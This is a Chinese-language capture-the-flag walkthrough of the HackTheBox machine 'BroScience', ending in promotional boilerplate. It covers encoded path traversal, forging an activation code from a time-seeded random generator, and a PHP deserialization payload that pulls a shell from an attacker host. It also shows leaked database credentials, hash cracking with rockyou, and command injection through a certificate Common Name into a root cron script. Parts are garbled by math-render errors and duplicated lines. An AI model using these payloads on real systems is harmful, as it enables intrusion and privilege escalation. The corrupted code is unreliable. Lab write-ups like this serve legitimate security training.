一、常规端口扫描
开放三个端口
二、web渗透
-
打开80端口是一个带有登录功能的健身网页
-
目录扫描一波,发现了几个目录列表,有源码泄露漏洞
-
点击img.php,有个错误提示,提示缺少path参数
-
那就拼接好参数,尝试能否读取到系统文件,直接写…/…/…/…/…/etc/passwd会被拦截,有参数过滤,但是通过两次url编码可以绕过
-
把读取到的passwd下载到本地,发现这台机器有三个用户,分别是root,bill和postgres
-
利用curl把includes目录的php文件全下载到本地,便于之后的分析需要
-
回到之前的网页,本来想着是自己注册一个账号登录,看看后台是否含有利用的点,但是注册完毕后还要点击验证链接,由于是靶场环境,只能自己尝试绕过
-
把注册页面的register.php下载下来分析一波源码
发现在注册用户的时候调用了utils.php并且发送激活链接调用了activate.php
再把activate.php下载下来分析,发现这个页面只能告诉我们验证码是个32位的字母和数字组合
在activate.php没得到更多有用的信息,但是之前分析register.php的时候发现还调用了utils.php,于是把之前下载的utils.php来拿出来分析一波,在阅读utils.php的时候,这个php文件的第一段代码就直接告诉我们了生成验证码的方法,利用注册时的系统时间来初始化随机数的种子值,从而生成一个32位字符的验证码,这里还有一个可以利用的点,后面会说到
那我们就可以直接用他这个源码生成一个验证码
php中time函数生成的值如下格式,可以找到注册时间再利用https://www.epochconverter.com/这个网站来生成
新建一个yzm.php文件,内容如下,之后利用php -f yzm.php来生成激活码
<?php
function generate_activation_code() {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand(1676033457); // 这里的值由上面网站生成
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
$activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}
return $activation_code;
}
echo generate_activation_code() ;
?>
-
回到注册页面打开f12,把请求内容复制下来,利用curl来显示出cookie以及请求时间
curl -X POST -d 'username=asd&email=asd%40htb.com&password=asd&password-confirm=asd' https://broscience.htb/register.php -k -i
-
在利用curl拼接上cookie和上面生成的激活码来激活账号(这里图片跟上面不一致,是因为这个靶场会定期删除账号及上传内容)
curl -k -X POST -b 'PHPSESSID=q2aivm3nb6aid52je1c3c7kull' https://broscience.htb/activate.php?code=mokEoV8EyMTtc2ouUJfio6eXjyQPbNdL -i
- 利用激活的账号,登录到网站中,有个用户界面,在之前分析utils.php中发现这个php文件还负责生成用户cookie中的user-prefs,并且还具有一个可利用的反序列化漏洞。
在utils.php中avatar 类有两个参数,一个参数imgpath用于指向图像的路径,另一个tmp参数作用是保存img传来的内容。
在AvatarInterface中有一个__wakeup()魔法函数,用于创建 avatar 类的新实例和avatar类的类保存方法。
所以我们可以将
imgpath路径直接设置为我们反连shell的地址,tmp路径会将其保存在当前目录下,之后可以访问shell.php并且获得一个shell。
反序列化php内容如下,这里的shell.php,我用的是kali自带的,用其他的也一样道理
<?php
class Avatar {
public $imgPath;
public function __construct($imgPath) {
$this->imgPath = $imgPath;
}
public function save($tmp) {
$f = fopen($this->imgPath, "w");
fwrite($f, file_get_contents($tmp));
fclose($f);
}
}
class AvatarInterface {
public $tmp="http://10.10.14.25:80/shell.php";
public $imgPath="./shell.php";
public function __wakeup() {
$a = new Avatar($this->imgPath);
$a->save($this->tmp);
}
}
$payload = base64_encode(serialize(new AvatarInterface));
echo $payload;
?>
利用php -f payload.php运行输出,得到含有恶意代码的cookie,再把此cookie利用cookie
editor插件写入页面同时利用python临时生成一个web服务器,之后刷新网页
- 访问https://broscience.htb/shell.php成功得到一个shell,找到一个立足点
但是这个shell的权限太低,需要提权才能读取到flag
三、提权至用户
-
在之前的过程中发现这台机器有个postgres用户,并且在泄露的源码中发现了db_connect.php(如下)直接暴露了数据库连接的账号密码等信息,于是想到连接postgresql看看能不能找到一些有用的账号密码
<?php
$db_host = “localhost”;
$db_port = “5432”;
$db_name = “broscience”;
$db_user = “dbuser”;
$db_pass = “RangeOfMotion%777”;
$db_salt = “NaCl”;KaTeX parse error: Expected '}', got 'EOF' at end of input: …connect("host={db_host} port={KaTeX parse error: Expected 'EOF', got '}' at position 8: db_port}̲ dbname={db_name} user={KaTeX parse error: Expected 'EOF', got '}' at position 8: db_user}̲ password={db_pass}");
if (!$db_conn) {
die(“Error: Unable to connect to database”);
}
这里我发现他在反弹回来的shell用psql连接时会一直卡住,但是用python生成一个交互式shell之后就没啥问题了
python3 -c "import pty;pty.spawn('/bin/bash')"
psql -h localhost -p 5432 -U dbuser -d broscience
进入shell之后利用\dt查看一下有哪些表,这里注意到有个users表,一般情况下账号密码应该保存在这个表下,利用\copy (SELECT * FROM
users) TO '/tmp/users.csv‘命令把users表转存在本地便于分析
查看users.csv,发现了几个用户名和密码,但是密码是加密的,由于这个机器涉及到的用户只有bill,那就利用hashcat直接针对bill的密码hash值进行破解,hashcat -m 20 bill.txt /usr/share/wordlists/rockyou.txt
得到bill:iluvhorsesandgym
- 利用得到的账号密码进行ssh登录,成功获取user.txt的flag
四、提权至ROOT
-
拿到userflag之后又是一些常规的提权信息收集,在跑pspy脚本时发现有个计划任务再以root身份运行
-
切到/opt目录查看一下renew_cert.sh是做什么的,内容如下:
#!/bin/bash
if [ “$#” -ne 1 ] || [ $1 == “-h” ] || [ $1 == “–help” ] || [ $1 == “help” ]; then
echo “Usage: $0 certificate.crt”;
exit 0;
fiif [ -f $1 ]; then
openssl x509 -in $1 -noout -checkend 86400 > /dev/null if [ $? -eq 0 ]; then echo "No need to renew yet."; exit 1; fi subject=$(openssl x509 -in $1 -noout -subject | cut -d "=" -f2-) country=$(echo $subject | grep -Eo 'C = .{2}') state=$(echo $subject | grep -Eo 'ST = .*,') locality=$(echo $subject | grep -Eo 'L = .*,') organization=$(echo $subject | grep -Eo 'O = .*,') organizationUnit=$(echo $subject | grep -Eo 'OU = .*,') commonName=$(echo $subject | grep -Eo 'CN = .*,?') emailAddress=$(openssl x509 -in $1 -noout -email) country=${country:4} state=$(echo ${state:5} | awk -F, '{print $1}') locality=$(echo ${locality:3} | awk -F, '{print $1}') organization=$(echo ${organization:4} | awk -F, '{print $1}') organizationUnit=$(echo ${organizationUnit:5} | awk -F, '{print $1}') commonName=$(echo ${commonName:5} | awk -F, '{print $1}') echo $subject; echo ""; echo "Country => $country"; echo "State => $state"; echo "Locality => $locality"; echo "Org Name => $organization"; echo "Org Unit => $organizationUnit"; echo "Common Name => $commonName"; echo "Email => $emailAddress"; echo -e "\nGenerating certificate..."; openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout /tmp/temp.key -out /tmp/temp.crt -days 365 <<<"$country $state $locality $organization $organizationUnit $commonName $emailAddress " 2>/dev/null /bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/$commonName.crt"
else
echo “File doesn’t exist”
exit 1; -
通过分析发现renew_cert.sh脚本主要是用来检查SSL证书是否过期的,但是他的倒数第四行却有个可控变量$commonName,我们可以利用openssl生成一个新证书,在填写Common Name这一栏时加入恶意代码,让它以root权限运行,从而获得root权限
openssl req -x509 -sha256 -nodes -newkey rsa:4096 -days 1 -keyout broscience.key -out broscience.crt
- 之后就等待脚本运行,利用/bin/bash -p成功获取到root.txt的flag
req -x509 -sha256 -nodes -newkey rsa:4096 -days 1 -keyout broscience.key -out broscience.crt
[外链图片转存中…(img-m5j6QxKe-1692028394578)]
- 之后就等待脚本运行,利用/bin/bash -p成功获取到root.txt的flag
[外链图片转存中…(img-Ec1rOHAq-1692028394578)]
网络安全工程师(白帽子)企业级学习路线
第一阶段:安全基础(入门)
第二阶段:Web渗透(初级网安工程师)
第三阶段:进阶部分(中级网络安全工程师)
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
学习资源分享
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YdI7XLYa-1692028394580)(C:\Users\Administrator\Desktop\网络安全资料图\微信截图_20230201105953.png)]